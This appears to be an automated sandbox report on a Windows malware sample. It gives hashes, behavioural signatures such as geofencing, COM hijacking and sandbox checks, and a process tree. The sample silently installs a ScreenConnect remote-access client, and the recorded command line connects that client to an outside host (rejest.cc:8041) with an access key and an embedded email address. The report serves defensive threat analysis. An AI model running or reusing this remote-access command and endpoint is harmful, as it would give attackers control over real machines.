Analysis

  • max time kernel
    139s
  • max time network
    142s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250314-en
  • resource tags

    arch:x64 arch:x86 image:win10v2004-20250314-en locale:en-us os:windows10-2004-x64 system
  • submitted
    31/03/2025, 15:37

General

  • Target

    2025-03-31_30c990bbafdbf6cb080eb5363941537a_amadey_black-basta_hijackloader_luca-stealer_smoke-loader.exe

  • Size

    5.6MB

  • MD5

    30c990bbafdbf6cb080eb5363941537a

  • SHA1

    ae17ba3b1571172b1ba3272afcf05680187fc116

  • SHA256

    e6c425b4695540614f5868913f9e7a509227b4b043e63058534f05430d747d98

  • SHA512

    991291a745e4b2d1abf3097b1081ec6c418d328cfbbaa374f0dace366fef4149141fc8e02903a913c0965568b1a3d3731bbc68ceaf17745192c28137baa7684b

  • SSDEEP

    98304:Nv8s6efPOrJJNr2uTvY8vYEoQTJ9GGPrQZU/:SfefPOrJH2ulvYPQTJY

Signatures

  • Sets service image path in registry 2 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 46 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Boot or Logon Autostart Execution: Authentication Package 1 TTPs 1 IoCs

    Suspicious Windows Authentication Registry Modification.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up the country code configured in the registry, likely for geofencing.

  • Drops file in System32 directory 15 IoCs
  • Event Triggered Execution: Component Object Model Hijacking 1 TTPs

    Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.

  • Drops file in Program Files directory 19 IoCs
  • Drops file in Windows directory 13 IoCs
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 22 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks SCSI registry key(s) 3 TTPs 5 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Modifies data under HKEY_USERS 9 IoCs
  • Modifies registry class 37 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of WriteProcessMemory 19 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\2025-03-31_30c990bbafdbf6cb080eb5363941537a_amadey_black-basta_hijackloader_luca-stealer_smoke-loader.exe
    "C:\Users\Admin\AppData\Local\Temp\2025-03-31_30c990bbafdbf6cb080eb5363941537a_amadey_black-basta_hijackloader_luca-stealer_smoke-loader.exe"
    1⤵
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:5580
    • C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\25.1.10.9197\2d432b9535833ef5\ScreenConnect.ClientSetup.msi"
      2⤵
      • Enumerates connected drives
      • System Location Discovery: System Language Discovery
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      PID:5212
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Enumerates connected drives
    • Boot or Logon Autostart Execution: Authentication Package
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • Modifies data under HKEY_USERS
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:5520
    • C:\Windows\syswow64\MsiExec.exe
      C:\Windows\syswow64\MsiExec.exe -Embedding 643CA9AC9E49CAFB6F0B0C0364E32CDF C
      2⤵
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:4612
      • C:\Windows\SysWOW64\rundll32.exe
        rundll32.exe "C:\Users\Admin\AppData\Local\Temp\MSIADF3.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240627250 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
        3⤵
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        PID:4800
    • C:\Windows\system32\srtasks.exe
      C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
      2⤵
        PID:1148
      • C:\Windows\syswow64\MsiExec.exe
        C:\Windows\syswow64\MsiExec.exe -Embedding AB1E1A11151AE1CACF184826317F12DF
        2⤵
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        PID:1188
      • C:\Windows\syswow64\MsiExec.exe
        C:\Windows\syswow64\MsiExec.exe -Embedding F92629996C31B41A0C34442FE45DC78A E Global\MSI0000
        2⤵
        • Drops file in Windows directory
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        PID:5704
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Checks SCSI registry key(s)
      PID:3604
    • C:\Program Files (x86)\ScreenConnect Client (2d432b9535833ef5)\ScreenConnect.ClientService.exe
      "C:\Program Files (x86)\ScreenConnect Client (2d432b9535833ef5)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=rejest.cc&p=8041&s=f1114cb0-91a5-4a81-a116-307f0509c4c0&k=BgIAAACkAABSU0ExAAgAAAEAAQBp%2bJGMa91H0EIaZUp1JSfs1tQp2glmd9d3Fqh7oaDqsNbG0uE3OJUR9WTwwW5BDDnqzMn0Hcnhd4J4rBUbt4ESbZlIEl23luwCq%2bOuCtCA42YRZjccLHdfUMjCo827%2bDhzcmHXDEFydKePkuwdZ%2fwnk%2bwU%2fQifI1nE7YjysQcStjDi4TKwkdxWN6L1f7Rk1NnIll%2fLjisBxhN7SAjIUj8rEF7I8HxNTOsjVh89MeIUGaCyWn6Hz7vuKj5tOC2ecDI74%2bgqCwHaQVum3MHlKmS4WcqM1i2QnC2WzJp2p8X6jflqdMG4gGR2KaHuANfBW9xN%2fadZColgHPt2WY7HOES1&t=ostryzawodnik1%40gmail.com%2048661113370&c=PL%20Rachtan"
      1⤵
      • Sets service image path in registry
      • Drops file in System32 directory
      • Executes dropped EXE
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      • Modifies data under HKEY_USERS
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:3656
      • C:\Program Files (x86)\ScreenConnect Client (2d432b9535833ef5)\ScreenConnect.WindowsClient.exe
        "C:\Program Files (x86)\ScreenConnect Client (2d432b9535833ef5)\ScreenConnect.WindowsClient.exe" "RunRole" "6efaefe0-3bba-4e71-8860-0762530e8348" "User"
        2⤵
        • Executes dropped EXE
        PID:184

    Downloads
